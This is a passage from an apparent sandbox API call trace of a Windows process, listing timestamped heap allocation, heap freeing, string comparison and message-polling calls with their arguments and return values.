cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" User", cchCount1=1, lpString2="*", cchCount2=1) returned 1 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afa0 | out: hHeap=0x650000) returned 1 [0072.955] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b270 [0072.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b2d8 | out: hHeap=0x650000) returned 1 [0072.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b270 | out: hHeap=0x650000) returned 1 [0072.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.955] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afa0 [0072.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.955] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906e0 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b1a0 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a940 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7e8 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afa0 | out: hHeap=0x650000) returned 1 [0072.956] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b88f8 [0072.956] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afa0 [0072.956] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.956] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0072.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afa0 | out: hHeap=0x650000) returned 1 [0072.957] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.957] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afa0 [0072.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afa0 | out: hHeap=0x650000) returned 1 [0072.957] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690680 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7e8 [0072.957] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0072.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7e8 | out: hHeap=0x650000) returned 1 [0072.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7e8 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690680 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d798 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afa0 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906e0 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0072.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906e0 | out: hHeap=0x650000) returned 1 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906e0 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a940 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906f0 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0072.957] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b138 [0072.957] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d900 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906f0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d838 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afb8 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906a0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8b0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b030 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0072.958] PeekMessageW (in: lpMsg=0x61eacc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eacc) returned 0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d860 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac88 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8c8 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b048 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0072.958] PeekMessageW (in: lpMsg=0x61eacc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eacc) returned 0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d8b0 [0072.958] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0072.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0072.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0072.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0072.959] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908f0 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.959] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.960] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.961] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.962] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0072.963] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0072.963] PeekMessageW (in: lpMsg=0x61eacc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eacc) returned 0 [0072.963] PeekMessageW (in: lpMsg=0x61eacc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eacc) returned 0 [0072.963] PeekMessageW (in: lpMsg=0x61eacc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eacc) returned 0 [0072.963] PeekMessageW (in: lpMsg=0x61eacc, hWnd=0x0, wMsgFilterMin=0x0, 